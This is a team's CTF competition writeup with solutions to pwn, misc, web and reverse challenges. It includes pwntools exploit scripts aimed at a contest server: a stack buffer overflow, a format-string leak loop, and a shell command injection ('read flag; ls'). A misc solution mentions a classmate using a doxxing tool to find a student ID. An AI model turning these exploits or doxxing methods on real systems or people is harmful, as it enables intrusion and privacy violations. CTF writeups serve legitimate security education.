【Pvvn】XAUTCTF-NewCup-Part1

Preface

Team name: sdfghj

Score: 3141

Rank: 5

Pwn

TestNc

  • Connect with nc

TestNc-1

TestNc-2

Calc

In a hurry, submitting this first; will fill in the rest later

  • exp.py
➜  calc cat exp.py 
from pwn import *
context.log_level = 'debug'
# io = process('./pwn')
io = remote('47.121.201.96', 64902)
elf = ELF('./pwn')
gift = elf.sym['gift']  # backdoor function already present in the binary, so no shellcode or libc leak is needed
ret = 0x00000000004008e7  # a bare `ret` gadget: the extra pop keeps rsp 16-byte aligned when gift runs (the usual movaps fix)
# 0x20 bytes of buffer + 8 bytes of saved rbp, then the return address is overwritten
payload = b'A' * (0x20 + 8) + p64(ret) + p64(gift)
# 0x00000000004007b6 gift
io.sendline(payload)
io.recv()
io.interactive()

Calc-1

Calc-2

危险的格式化字符串 (Dangerous Format String)

Thanks to pwn grandpa for the patient guidance 55555

危险的格式化字符串-1

from pwn import *

i = 0

ip = "47.121.201.96"
port = 61318

# Step 1: find the positional-argument index at which the flag sits on the stack.
# The server formats our name once per connection, so every probe is a fresh connection.
while True:
    p = None
    try:
        print(f"{i = }")  # candidate offset
        p = remote(ip, port)

        p.recvuntil(b"What's your name?\n")  # the payload goes right after this prompt
        p.send(f"%{i}$p".encode())  # leak the i-th positional argument as a pointer-sized hex value
        i += 1  # incremented BEFORE the check below, so after the loop the hit is at i-1

        p.recvuntil(b"Hello ")  # the echoed name follows "Hello "
        result = p.recvuntil(b"\n", drop=True)
        result = int(result.decode(), 16)  # "0x..." -> int; "(nil)" raises ValueError and is skipped by the except
        print(p64(result))  # the 8 raw bytes of that stack slot; look for the XAUTCTF prefix
        p.close()
        if b'XAUTCTF' in p64(result):
            print(result)  # this slot holds the start of the flag
            break
    except Exception as ex:
        if p is not None:
            p.close()
        continue
print(f"{i = }")  # one past the correct offset because of the early i += 1

# Step 2: dump the flag slot by slot.
flag = b''
for j in range(i-1, i+5):  # i-1 is the slot containing XAUTCTF; a few more 8-byte slots cover the rest of the flag
    p = None
    try:
        p = remote(ip, port)

        p.recvuntil(b"What's your name?\n")
        p.send(f"%{j}$p".encode())  # same leak primitive, next slot

        p.recvuntil(b"Hello ")
        result = p.recvuntil(b"\n", drop=True)
        result = int(result.decode(), 16)
        flag += p64(result)  # append the 8 leaked bytes in the order they are stored (little-endian)
        p.close()
    except Exception:
        if p is not None:
            p.close()
        continue
print(f"{flag = }")

  • Points to note

p.recvuntil(b"What's your name?\n")
p.send(f"%{j}$p".encode())  # payload

  • The difference between %n$p and %n$x: %p prints the whole pointer-sized value (8 bytes on x86-64), while %x treats the argument as an unsigned int and prints only its low 4 bytes, so half of every flag chunk would be lost.

危险的格式化字符串-注意点-1
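The offset search and the slot-by-slot dump above can be exercised offline. The following is an added example, not the author's script and not the challenge service: it builds a constructed stand-in for the stack that printf reads its positional arguments from (a few junk bytes, then the flag buffer, deliberately not 8-byte aligned), simulates what `%n$p` and `%n$x` would print for slot n, and reassembles the flag from the leaked QWORDs. The sample flag, the junk prefix and the resulting slot numbers are assumptions for the demo and say nothing about the real challenge's offsets; on the live service each `leak_fn(n)` call corresponds to one fresh connection, exactly as in the script.

```python
import struct

# Constructed sample flag; the real one lives only on the challenge server.
FLAG = b"XAUTCTF{f0rm4t_str1ng_l34k_s4mpl3}"


def build_fake_stack(flag, junk=b"A" * 12):
    """Constructed stand-in for the stack printf reads positional arguments
    from: 12 junk bytes, then the flag buffer, NUL-padded. The flag therefore
    starts at byte 12, i.e. in the middle of the second 8-byte slot."""
    raw = junk + flag
    raw += b"\x00" * (-len(raw) % 8)
    return [struct.unpack("<Q", raw[k:k + 8])[0] for k in range(0, len(raw), 8)]


def leak_p(words, n):
    """What printf("%<n>$p") prints for positional argument n (1-based):
    glibc prints the value as 0x... without zero padding, and 0 as "(nil)"."""
    if not 1 <= n <= len(words):
        raise IndexError("no such slot")
    v = words[n - 1]
    return "(nil)" if v == 0 else "0x%x" % v


def leak_x(words, n):
    """Same slot read with %<n>$x: %x is an unsigned int, so only the low
    32 bits come back and half of every 8-byte flag chunk is lost."""
    if not 1 <= n <= len(words):
        raise IndexError("no such slot")
    return "%x" % (words[n - 1] & 0xFFFFFFFF)


def parse_p(text):
    """Turn the printed %p value back into an int ("(nil)" -> 0)."""
    return 0 if text == "(nil)" else int(text, 16)


def locate_flag(leak_fn, max_n=64, marker=b"XAUTCTF"):
    """Leak slots 1..max_n, rebuild the raw stack bytes in slot order and find
    the flag inside them. Searching the joined bytes instead of each slot on
    its own also catches a marker that straddles two slots.
    Returns (slot_number, byte_offset_inside_slot, flag_bytes) or None."""
    stack = b""
    for n in range(1, max_n + 1):
        try:
            stack += struct.pack("<Q", parse_p(leak_fn(n)))
        except (IndexError, ValueError, struct.error):
            stack += b"\x00" * 8  # unreadable slot: keep the alignment
    start = stack.find(marker)
    if start < 0:
        return None
    end = stack.find(b"}", start)
    flag = stack[start:end + 1] if end >= 0 else stack[start:].rstrip(b"\x00")
    return start // 8 + 1, start % 8, flag


if __name__ == "__main__":
    words = build_fake_stack(FLAG)
    slot, off, flag = locate_flag(lambda n: leak_p(words, n))
    print(f"flag starts in slot {slot} at byte {off}: {flag}")
    print("slot 2 via %p:", leak_p(words, 2), "-> 8 bytes of stack")
    print("slot 2 via %x:", leak_x(words, 2), "-> only the low 4 bytes")
```

Because the flag is not slot-aligned in the constructed stack, checking each 8-byte slot on its own (as the page's first loop does) would still succeed here only because the marker happens to fit in slot 2; joining the slots first is what makes the search independent of alignment.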

ez_pwn

ez_pwn - result

read flag; ls

This reveals the real name of the flag file: f@1111111g

Connect to the remote and enter: read f@1111111g

→ (what actually runs is) cat f@1111111g, so the `;` in the first input terminates the cat command and lets `ls` run as a second shell command

IDA decompilation - read_file function

Key function: read_file

IDA decompilation - systemctl function

IDA decompilation - main function

ez_pwn - solving process

ez_pwn - knowledge points

pwn grandpa's reminder
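What the `read flag; ls` trick relies on is that the file name is pasted into a `cat ...` command string and handed to a shell, so `;` ends the cat command and starts a second one. The following added example (mine, not the challenge's code or the author's) reproduces that pattern in Python next to a hardened version: the command string is built the way the binary effectively does and run with `shell=True` (the Python counterpart of C's `system()`), while the fix validates the name against an allow-list and runs `cat` with an argv list and no shell. The temporary directory, the decoy `flag` file and both file contents are constructed for the demo; `f@1111111g` is the name from the writeup.

```python
import os
import re
import subprocess
import tempfile

# File name reported by the writeup; the decoy "flag" and the contents below
# are constructed for this demo.
REAL_FLAG_NAME = "f@1111111g"


def build_shell_command(name):
    """The vulnerable pattern: the user's file name is spliced into a
    "cat <name>" string that a shell will run (system() in the binary).
    Shell metacharacters in `name` are interpreted, not quoted."""
    return "cat " + name


def run_vulnerable(name, cwd):
    """Execute the command the way system() would: via /bin/sh -c."""
    r = subprocess.run(build_shell_command(name), shell=True, cwd=cwd,
                       capture_output=True)
    return r.stdout


_SAFE_NAME = re.compile(r"[A-Za-z0-9_.@-]{1,64}")


def filename_is_safe(name):
    """Allow-list check: plain characters only (so no ';', '|', '$', '`',
    spaces or '/'), no leading '-' (would become a cat option) and no '..'."""
    return (bool(_SAFE_NAME.fullmatch(name))
            and not name.startswith("-")
            and ".." not in name)


def run_hardened(name, cwd):
    """No shell at all: argv is passed as a list, so even a metacharacter
    that slipped past the allow-list would just be part of a file name."""
    if not filename_is_safe(name):
        raise ValueError("rejected file name: %r" % name)
    r = subprocess.run(["cat", "--", name], cwd=cwd, capture_output=True)
    return r.stdout


def make_demo_dir():
    """Constructed working directory: a decoy 'flag' next to the real file."""
    d = tempfile.mkdtemp()
    with open(os.path.join(d, "flag"), "wb") as f:
        f.write(b"decoy\n")
    with open(os.path.join(d, REAL_FLAG_NAME), "wb") as f:
        f.write(b"XAUTCTF{sample_not_the_real_flag}\n")
    return d


if __name__ == "__main__":
    d = make_demo_dir()
    print(build_shell_command("flag; ls"))           # cat flag; ls
    print(run_vulnerable("flag; ls", d).decode())    # decoy, then the directory listing
    print(run_hardened(REAL_FLAG_NAME, d).decode())  # reads the file without a shell
    try:
        run_hardened("flag; ls", d)
    except ValueError as e:
        print(e)                                     # rejected file name
```

The allow-list and the shell-free argv are independent defences: the first rejects the injection at the input boundary, the second guarantees that whatever string reaches `cat` is treated as a single file name.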

Misc

Where are you?

Social engineering... so much fun

1

XAUTCTF{9-}

2

Couldn't tell which floor, forget it

Floor 5 or 6; considering the shooting angle, keep analyzing

4

You can see the angle toward Jiaotong University across the way; from everyday experience the room number should be below 15, most likely 0-something

5

Room number basically narrowed down to 0-something

Floor locked to 5

  • Then try them one by one

  • If I remember right it should be: XAUTCTF{9-504}

学号 (Student ID)

  • Asked a junior classmate for help, who used a doxxing tool (premium edition)

Student ID

Hello CTFer

  • Ask Xiao Qi

Hello CTFer

This thing is pretty fun; I'll make one myself next time

PS:I Hate To Hack AI :(

Web

WEB_Starter

  • F12 and look at the comments

Reverse

PyRe

1 0 LOAD_CONST 0 (0)
2 LOAD_CONST 1 (('flag',))
4 IMPORT_NAME 0 (flag)
6 IMPORT_FROM 0 (flag)
8 STORE_NAME 0 (flag)
10 POP_TOP

2 12 LOAD_CONST 0 (0)
14 LOAD_CONST 2 (None)
16 IMPORT_NAME 1 (base64)
18 STORE_NAME 1 (base64)

4 20 LOAD_NAME 2 (str)
22 LOAD_NAME 2 (str)
24 LOAD_NAME 3 (bytes)
26 LOAD_CONST 3 (('flag', 'key', 'return'))
28 BUILD_CONST_KEY_MAP 3
30 LOAD_CONST 4 (<code object chipher at 0x0000022170BC2920, file ".\attachment.py", line 4>)
32 LOAD_CONST 5 ('chipher')
34 MAKE_FUNCTION 4 (annotations)
36 STORE_NAME 4 (chipher)

11 38 LOAD_NAME 5 (__name__)
40 LOAD_CONST 6 ('__main__')
42 COMPARE_OP 2 (==)
44 POP_JUMP_IF_FALSE 72

12 46 LOAD_CONST 7 ('XAUTCTF2024')
48 STORE_NAME 6 (key)

13 50 LOAD_NAME 4 (chipher)
52 LOAD_NAME 0 (flag)
54 LOAD_NAME 6 (key)
56 CALL_FUNCTION 2
58 STORE_NAME 7 (crypto)

14 60 LOAD_NAME 8 (print)
62 LOAD_NAME 7 (crypto)
64 LOAD_METHOD 9 (decode)
66 CALL_METHOD 0
68 CALL_FUNCTION 1
70 POP_TOP
>> 72 LOAD_CONST 2 (None)
74 RETURN_VALUE

Disassembly of <code object chipher at 0x0000022170BC2920, file ".\attachment.py", line 4>:
5 0 LOAD_CONST 1 ('')
2 STORE_FAST 2 (crypto)

6 4 LOAD_GLOBAL 0 (range)
6 LOAD_GLOBAL 1 (len)
8 LOAD_FAST 0 (flag)
10 CALL_FUNCTION 1
12 CALL_FUNCTION 1
14 GET_ITER
>> 16 FOR_ITER 44 (to 62)
18 STORE_FAST 3 (i)

7 20 LOAD_FAST 2 (crypto)
22 LOAD_GLOBAL 2 (chr)
24 LOAD_GLOBAL 3 (ord)
26 LOAD_FAST 0 (flag)
28 LOAD_FAST 3 (i)
30 BINARY_SUBSCR
32 CALL_FUNCTION 1
34 LOAD_GLOBAL 3 (ord)
36 LOAD_FAST 1 (key)
38 LOAD_FAST 3 (i)
40 LOAD_GLOBAL 1 (len)
42 LOAD_FAST 1 (key)
44 CALL_FUNCTION 1
46 BINARY_MODULO
48 BINARY_SUBSCR
50 CALL_FUNCTION 1
52 BINARY_XOR
54 CALL_FUNCTION 1
56 INPLACE_ADD
58 STORE_FAST 2 (crypto)
60 JUMP_ABSOLUTE 16

8 >> 62 LOAD_GLOBAL 4 (base64)
64 LOAD_METHOD 5 (b64encode)
66 LOAD_FAST 2 (crypto)
68 LOAD_METHOD 6 (encode)
70 CALL_METHOD 0
72 CALL_METHOD 1
74 RETURN_VALUE


#OUTPUT: AAAAAAAAAElUC1dqJTZtInkkUwQEGWxwZGZuMCMBUh8COnRmYHIwIwUDUQIl

Solved it with AI )))

AI says: we need to understand the given bytecode, reverse it back into the original Python code, and finally decrypt the flag

import base64

def decrypt(crypto, key):
    # Undo chipher(): base64-decode, then XOR each character with the repeating key
    crypto = base64.b64decode(crypto).decode()
    flag = ''
    for i in range(len(crypto)):
        flag += chr(ord(crypto[i]) ^ ord(key[i % len(key)]))
    return flag

if __name__ == '__main__':
    key = 'XAUTCTF2024'  # the constant loaded by LOAD_CONST 7 in the bytecode
    encrypted_flag = 'AAAAAAAAAElUC1dqJTZtInkkUwQEGWxwZGZuMCMBUh8COnRmYHIwIwUDUQIl'
    decrypted_flag = decrypt(encrypted_flag, key)
    print(decrypted_flag)

PyRe-1
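To check a bytecode reconstruction like the one above, rebuild the forward function and confirm it round-trips. The following is an added example, not the author's script and not the challenge source: `chipher` is rewritten from the disassembly (the XOR loop at offsets 16 to 60 and the `b64encode(crypto.encode())` at 62 to 72), `decrypt` inverts it, and `recover_key_prefix` shows a known-plaintext shortcut: because every flag starts with `XAUTCTF{`, XORing the first eight ciphertext bytes with that prefix yields the first eight key bytes even if the key were not sitting in the bytecode as a constant. The only inputs are the ciphertext and key from the page; the round trip and the recovered prefix are what the block verifies.

```python
import base64

# Ciphertext printed by the challenge and the key constant seen in the bytecode
# (LOAD_CONST 7 ('XAUTCTF2024')), both taken from the writeup.
OUTPUT = "AAAAAAAAAElUC1dqJTZtInkkUwQEGWxwZGZuMCMBUh8COnRmYHIwIwUDUQIl"
KEY = "XAUTCTF2024"


def chipher(flag: str, key: str) -> bytes:
    """Forward function rebuilt from the disassembly:
    for i in range(len(flag)): crypto += chr(ord(flag[i]) ^ ord(key[i % len(key)]))
    return base64.b64encode(crypto.encode())"""
    crypto = ''
    for i in range(len(flag)):
        crypto += chr(ord(flag[i]) ^ ord(key[i % len(key)]))
    return base64.b64encode(crypto.encode())


def decrypt(crypto: str, key: str) -> str:
    """Inverse: base64-decode, then XOR each character with the repeating key."""
    raw = base64.b64decode(crypto).decode()
    return ''.join(chr(ord(raw[i]) ^ ord(key[i % len(key)])) for i in range(len(raw)))


def recover_key_prefix(crypto: str, known_plaintext: str = "XAUTCTF{") -> str:
    """Known-plaintext attack on repeating-key XOR: ciphertext XOR plaintext
    gives back as many key bytes as plaintext bytes we know."""
    raw = base64.b64decode(crypto)[:len(known_plaintext)]
    return ''.join(chr(c ^ ord(p)) for c, p in zip(raw, known_plaintext))


def verify_round_trip(crypto: str, key: str) -> bool:
    """True if re-encrypting the decrypted text reproduces the ciphertext exactly,
    which is the check that the reconstructed chipher matches the bytecode."""
    return chipher(decrypt(crypto, key), key).decode() == crypto


if __name__ == "__main__":
    print("key prefix from known plaintext:", recover_key_prefix(OUTPUT))
    print("round trip ok:", verify_round_trip(OUTPUT, KEY))
    print(decrypt(OUTPUT, KEY))
```

The recovered prefix `XAUTCTF2` matches the constant in the bytecode, and the leading `AAAAAAAAA` of the ciphertext is no accident: the first seven flag bytes equal the first seven key bytes, so their XOR is all zeros.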

Re就这? (Re, is that all?)

  • Drag it into IDA64 and press F5
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[32]; // [rsp+20h] [rbp-60h] BYREF
  int v5[31]; // [rsp+40h] [rbp-40h] BYREF
  int i; // [rsp+BCh] [rbp+3Ch]

  _main(argc, argv, envp);
  memset(v5, 0, 0x78ui64);
  v5[0] = 19;
  v5[1] = 10;
  v5[2] = 30;
  v5[3] = 31;
  v5[4] = 8;
  v5[5] = 31;
  v5[6] = 13;
  v5[7] = 48;
  v5[8] = 124;
  v5[9] = 3;
  v5[10] = 122;
  v5[11] = 17;
  v5[12] = 20;
  v5[13] = 122;
  v5[14] = 24;
  v5[15] = 20;
  v5[16] = 120;
  v5[17] = 51;
  v5[18] = 40;
  v5[19] = 124;
  v5[20] = 61;
  v5[21] = 126;
  v5[22] = 2;
  v5[23] = 61;
  v5[24] = 14;
  v5[25] = 20;
  v5[26] = 36;
  v5[27] = 57;
  v5[28] = 54;
  printf("Welcome, I can help you verify your flag:>>");
  scanf("%s", v4);
  for ( i = 0; i <= 28; ++i )
  {
    if ( v4[i] != (v5[i] ^ 0x4B) )
    {
      puts("Sorry, your flag is incorrect!");
      return 0;
    }
  }
  puts("Yes, your flag is correct!");
  return 0;
}
v5 = [
19, 10, 30, 31, 8, 31, 13, 48, 124, 3, 122, 17, 20, 122, 24, 20, 120, 51, 40, 124, 61, 126, 2, 61, 14, 20, 36, 57, 54
]

key = 0x4B

flag = ''.join(chr(v5[i] ^ key) for i in range(29))

print(flag)

Re就这?-1

  • Copyrights © 2024-2025 brocademaple